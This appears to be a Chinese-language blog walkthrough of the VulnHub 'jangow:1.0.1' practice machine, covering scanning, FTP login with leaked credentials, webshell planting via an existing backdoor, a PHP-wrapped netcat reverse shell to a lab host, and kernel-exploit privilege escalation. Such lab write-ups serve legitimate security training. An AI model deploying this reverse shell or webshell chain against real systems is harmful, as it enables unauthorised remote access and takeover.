vulnhub-jangow:1.0.1

jangow:1.0.1

日常练习

0x01 信息收集

nmap老规矩扫一扫
image
192.168.56.118存活,80端口和21端口开着。
image
image
逛了一圈没看到什么有价值的信息,爆破一下路径看看。
image
site目录刚刚看过了,.backup看看是什么
image
这里面有数据库的账户密码,暂时不知道是用在哪。到这里没有什么有用的了。


0x02 FTP登录

刚刚端扫扫出来的另一个21端口,利用windows的直接在文件路径下键入

ftp://192.168.56.118

这里需要输入账户密码,匿名登陆登不上去,这里用刚刚网页上看到数据库密码

jangow01
abygurl69

image
登录成功,路径应该是/var/www/,进入html/site下
image
有一个busque.php文件,。


0x03 后门连接

查看发现是一个后门
image
利用这个后门再写一个后门(连个蚁剑)
image
写入成功
image
尝试连接蚁剑
image
连接成功


0x04 反弹shell

连个蚁剑方便上传文件,因为直接用nc反弹不了蚁剑,这里只能用php反弹shell,写入shell.php

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 443 >/tmp/f");?>

百度到一个反弹shell,这里用443是因为只能用这个端口才能,其他端口做了限制。
在本地开启监听

nc -lvvp 443

然后访问

http://192.168.56.118/site/shell.php

image
成功反弹shell


0x05 切换用户

可以看看/etc/passwd文件有哪些用户

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false

有一个jangow01用户,jangow01目录下有一个user.txt文件
image
看着像md5,拿去解密看看
image
猜测应该是jangow01的密码。
但是这里尝试了jangow01的密码不是解得的密码,于是想到原来数据库密码。
image
登录成功。


0x06 提升权限

查看一下linux内核版本

uname -a

image
用kali查看可利用的exp
image
下载到当前目录
image
然后利用蚁剑上传到目标主机的tmp目录
image
编译45010.c文件
image
编译后得到exp文件,运行
image
提权成功!查看root目录拿flag
image
完结撒花!


0x07 总结

考完试来做做练习(哈哈考试全过开心),简单的练习,好久没做了。

posted @ 2024-01-18 13:07  y2xsec  阅读(20)  评论(0编辑  收藏  举报